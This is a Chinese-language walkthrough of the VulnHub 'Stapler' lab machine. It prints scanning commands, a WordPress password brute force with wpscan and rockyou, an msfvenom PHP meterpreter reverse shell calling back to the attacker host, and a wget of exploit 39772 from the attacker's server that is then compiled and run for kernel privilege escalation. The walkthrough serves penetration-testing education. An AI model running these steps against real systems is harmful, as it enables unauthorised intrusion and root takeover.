CTF实战之Stapler

article/2025/9/18 23:32:32

CTF实战之Stapler

Penetrating Methodology:

0x01 网络扫描(Nmap, netdiscover)

nmap -sP 192.168.153.0/24		

通过筛选找到靶机地址
在这里插入图片描述

扫描靶机端口

nmap -sT -T4 -sV -p 1-65535 192.168.153.154

在这里插入图片描述

通过端口扫描发现靶机开了很多端口

我们一个一个来

先连接FTP和SSH试一下

在这里插入图片描述

在这里插入图片描述

虽然有密码 但发现一个有意思的事情

Harry和Barry都是人名,我们先收集起来等会用字典破解一下

0x02 网站目录(robots.txt)枚举

发现80端口开了个网站 访问了一下之后发现并没有东西

在这里插入图片描述

但有意思的是它在122380有一个https的网站

我们用robots协议(robots.txt)发现了两个目录

在这里插入图片描述

0x03 利用Wpscan对Wordpress站点扫描和密码破解

/blogblog/是一个wordpress 用wpscan扫描一下

wpscan --url https://192.168.153.154:12380/blogblog/ --enumerate u --disable-tls-checks

在这里插入图片描述

发现有很多用户,统一收集起来利用kali自带的字典文件和Wpscan暴力破解密码

wpscan --url https://192.168.153.154:12380/blogblog/ -P /usr/share/wordlists/rockyou.txt -t 50 --disable-tls-checks

在这里插入图片描述

0x04 登录WordPress

有了用户名和密码之后就可以登录WordPress了

在这里插入图片描述

只有john是管理员用户

0x05 利用Msfvenom生成PHP后门

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.153.33 lport=4444 -f raw -o webshell.php

0x06 上传后门

在这里插入图片描述

在这里插入图片描述

把创建的后门上传到wordpress

0x07 创建反向连接

msf>use explpit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.153.33
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

在这里插入图片描述

0x08 执行Python的pty模块获取用户的交互式shell

ps:要进入https://192.168.153.154:12380/blogblog/wp-content/uploads/点一下webshell.php

在这里插入图片描述

meterpreter> shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

0x09 提升权限,获取Flag

前提:利用wordpress的漏洞拿到了用户的shell,是一个普通用户。

1、利用系统版本和内核信息查找exp

lsb_release -a

在这里插入图片描述

uname -r

在这里插入图片描述

2、查找exp

方法一:

可以使用https://www.exploit-db.com/查找exp,并下载到家目录解压即可

在这里插入图片描述

方法二:

在kali中可以根据关键字查找漏洞利用文件(exp)

searchsploit 16.04

在这里插入图片描述

找到文件存放位置

find / -name 39772.txt

在这里插入图片描述

进入文件位置找到39772.zip,解压到家目录下

cd /root/.local/share/Trash/files
ls
cp 

在这里插入图片描述

3、在kali端架设一个HTTP服务器,让用户端端系统拿到exp

kali: python -m SimpleHTTPServer 8888

在这里插入图片描述

clent:
cd /tmp
wget http://192.168.153.33:8888/39772.zip
ls

在这里插入图片描述

4、执行下载的exp

(1):解压

unzip 39772.zip
cd 39772
tar xf exploit.tar

在这里插入图片描述

在这里插入图片描述

(2):进入解压的目录–执行

ls
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

在这里插入图片描述

5、获取Flag

cd ~
cat flag.txt

在这里插入图片描述


http://chatgpt.dhexx.cn/article/ZhMn1moM.shtml

相关文章

Jenkins 远程命令执行漏洞 (CVE-2018-1000861)复现

文章目录 漏洞描述(介绍、成因)漏洞危害适用场景实验环境漏洞复现过程1、 开启docker环境2、通过dnslog检测漏洞是否存在3、监听端口4、利用exp获取反弹shell 修复建议扩展知识(链接、文章) 漏洞描述(介绍、成因&#…

VulnHub-STAPLER: 1-靶机渗透学习

靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 靶机难度:中级(CTF) 靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challe…

【甄选靶场】Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权)

Vulnhub百个项目渗透 Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权) 靶场环境 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言&…

vulnhub靶机:Stapler

文章目录 0x000x01 靶机安装0x02 靶机发现0x03 端口探测0x04 信息收集端口21:FTP服务端口22:SSH服务端口80:HTTP服务端口139:SMB服务端口666:未知服务端口3306:MySQL服务端口12380:HTTP服务 0x0…

实战打靶集锦-006-Stapler

**写在前面:**记录博主的一次打靶经历。 目录 1. 主机发现2. 端口发现3. 服务枚举4. 服务探查4.1 FTP探查4.1.1 匿名登录4.1.2 Elly用户4.1.3 John用户4.1.4 EXP搜索 4.2 dnsmasq探查4.2.1 基础信息获取4.2.2 EXP搜索 4.3 WEB应用探查4.3.1 浏览器访问4.3.2 目录扫描…

Stapler: 1

Stapler: 1 项目地址:https://www.vulnhub.com/entry/stapler-1,150/ 文章目录 Stapler: 1一、信息收集:1. 靶机地址获取:2. 收集端口服务信息: 二、信息利用1. 针对12380端口进行web目录枚举:1.1 访问:ph…

No.10-VulnHub-Stapler: 1-Walkthrough渗透学习

** VulnHub-Stapler: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 靶机难度:中级(CTF) 靶机发布日期:2016年6月8日 靶机描述:Stapler is reported to be one of several v…

Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)

Stapler:1(STAPLER: 1)靶机渗透-Vulnhub 一、IP端口探测二、端口信息收集1.ftp匿名登录2.OpenSSH漏洞查询3.80端口4.666端口5.SMB枚举6.12380端口 二、边界突破1.video插件文件包含2.修改wordpress数据库管理员密码3.上传webshell 三、提权总…

Stapler#攻略

写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习; 一、实验准备 1、实验地址: Stapler: 1 ~ VulnHub 2、下载之后,本地解压,用VMware运行该虚拟机; ​ 3、设置stapler与攻击…

Stapler-1靶场详细教学(7种漏洞利用+5种提权)

目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏洞利用-3 0x08漏洞利用-4 0x09 漏洞利用-5 0x10 漏洞利用-6 0x11 漏洞利用-7 提权 0x12 提权-1-内核提权 0…

CSDN开通博客

今天想写博客,却发现没有开通博客页面没有发现验证码, 后来点击验证码输入框,验证码才出来。真是失策,我觉得还是在刷新页面的时候就显示验证码就好了。

【JavaScript 逆向】数美滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 验证码:aHR0cHM6Ly93d3cuaXNodW1laS5jb20vbmV3L3Byb2R1Y3QvdHcvY29kZQ 以上均做了脱敏处理,Base64 编码及解…

个人总结 - JS逆向解析

目前加密的方式总结有下面几点: 对称加密(加密解密密钥相同):DES、DES3、AES 非对称加密(分公钥私钥):RSA 信息摘要算法/签名算法:MD5、HMAC、SHA 前端实际使用中MD5、AES、RSA&a…

【JavaScript 逆向】抖店滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 接口: aHR0cHM6Ly93d3cuZG91eWluLmNvbS9hd2VtZS92MS93ZWIvdXNlci9wcm9maWxlL290aGVyLw 以上均做了脱敏处理&#…

MAC 逆向APK

准备逆向工具 apkTool 、apkTool.jar 、dex2Jar稳定版 (不要下载最新的2.0或者2.1 最新的dex2jar 运行会报错)、JUI 查看代码结构 (1) apkTool 、apkTool.jar:Apktool - How to Install 上面这段话是&#xff1…

java逆向_Java逆向入门(一)

Java是一门"半编译半解释"型语言.通过使用jdk提供的javac编译器可以将Java源码编译为Java虚拟机(Java Virtual Machine, JVM)可读的字节码(bytecode),即*.class文件. 学习字节码可以使你更好的理解Java虚拟机的行为,甚至对学习其它基于Java虚拟机的语言(如:Scala,Clo…

Android逆向基础——APK的格式

Android 安装包常以apk(android Package)、xapk为后缀,本质是一个压缩包,包内存存放运行着应用程序安装必要的所有资源、代码。可直接修改后缀为zip解包。 解包后目录大致如下: assets 资源文件,通过cont…

JS逆向笔记-记录某测试论坛的js逆向练习

这个网站应该是专门练习的,因为有个地方说不太通,在此只能算是练习,记录下,方便以后进行查阅。 首先访问主页: 他会设置一个cookie值,并且会把加密的salt 带出来。还有个叫lt的东西也会用html的形式传出来。…

Matlab逆向归纳法,逆向归纳法

逆向归纳法(backward induction)是求解动态博弈均衡的方法 [编辑] 什么是逆向归纳法 逆向归纳法(backward induction)是求解动态博弈均衡的方法。所谓动态博弈是指博弈参与人的行动存在着先后次序,并且后行动的参与人能够观察到前面的行动。逆向归纳法在逻辑上是严密…

逆向工程

逆向工程 数据库部分逆向工程说明导入文件 reverseProject添加相应jar包修改这个工程三个 .xml 文件都要修改的地方修改generatorConfig.xml文件 工程终点-运行GeneratorSqlMap.java文件 在使用mybatis时需要根据数据表创建实体类,pojo类的映射文件以及sql语句和Dao…